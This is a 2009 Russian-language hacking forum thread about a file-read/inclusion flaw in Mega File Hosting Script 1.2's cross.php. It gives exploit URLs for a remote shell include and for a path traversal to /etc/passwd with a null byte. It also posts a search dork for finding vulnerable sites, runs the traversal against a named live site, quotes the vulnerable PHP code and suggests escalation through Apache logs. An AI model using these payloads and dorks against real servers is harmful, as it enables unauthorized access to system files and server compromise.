Mega File Hosting [ RFI/ LFI ]

Discussion in 'Веб-уязвимости' started by GarryCka, 17 Mar 2009.

  1. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability

    удаленный / локальный файл включения

    для 1.2 версий :)

    #############################################
    # Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
    # Home: #
    # Www.hacking.ge #
    #############################################

    #############################################
    Просто помимо этого Exploit и наслаждайтесь #
    #############################################


    RFI: /cross.php?url=http://site.ru/shell.txt

    LFI: /cross.php?url=../../../../../../../../etc/passwd%00


    #############################################
    #
    Author: Garry /// 25/02/2009 #
    #
    #############################################
     
    #1 GarryCka, 17 Mar 2009
    Last edited: 19 Mar 2009
    1 person likes this.
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А Дорк?
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Мде...........
     
  4. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
    ТС покажи где он тут http://sharemee.co.uk/ например
     
    #4 PaCo, 18 Mar 2009
    Last edited: 18 Mar 2009
  5. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Дорк на Mega file hosting сайта:

    "Powered by: MFH " :)
     
  6. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif

    &

    и локальный файл включения в Linux-сервер:

    cross.php?url=../../../../../../../../etc/passwd%00 :)
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это код из cross.php

    PHP:
    if(function_exists('curl_init'))
    {
        
    $ch curl_init();
        
    curl_setopt($chCURLOPT_URL$url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);
        
    curl_setopt($chCURLOPT_HEADER0);
        
    curl_exec($ch);
        
    curl_close($ch);
    }
    elseif(
    ini_get('allow_url_fopen'))
    {
        echo 
    file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );
    }
    }
     
    #7 Kakoytoxaker, 18 Mar 2009
    Last edited: 18 Mar 2009
  8. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.


    UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных
     
    #8 PaCo, 18 Mar 2009
    Last edited: 18 Mar 2009
  9. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    jokester

    Да, это ошибка основана на меня
     
    1 person likes this.
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Не понял фразы поясни пожалуйста
     
    1 person likes this.
  11. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    эксплуатировать эту работает хорошо на локальный файл включения

    http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00

    Не взломать этот сайт!!!
     
  12. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    Powered by: MFH v1.2 катит

    Powered by: MFH v2.0 не катит
     
  13. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    jokester
    Основателем этого является ошибка: garry

    it's Me :)

    kysmi4

    da это правда
     
    #13 GarryCka, 18 Mar 2009
    Last edited: 18 Mar 2009
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Бред =\
    1) Через логи апача
    2) Найти реальный путь и читать файлы в поисках
     
  15. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    А зачем тогда писать для все версий?
     
  16. GarryCka

    GarryCka New Member

    Joined:
    11 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    kyzmi4
    sorry it's my error!

    http://milw0rm.com/exploits/8230 :)
     
  17. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Поправил свой пост с кодом.

    кому интересно

    http://depositfiles.com/ru/files/qq80v50yg/
    Mega_File_Hosting_Script_v1.1
     
    #18 Kakoytoxaker, 18 Mar 2009
    Last edited: 18 Mar 2009
    1 person likes this.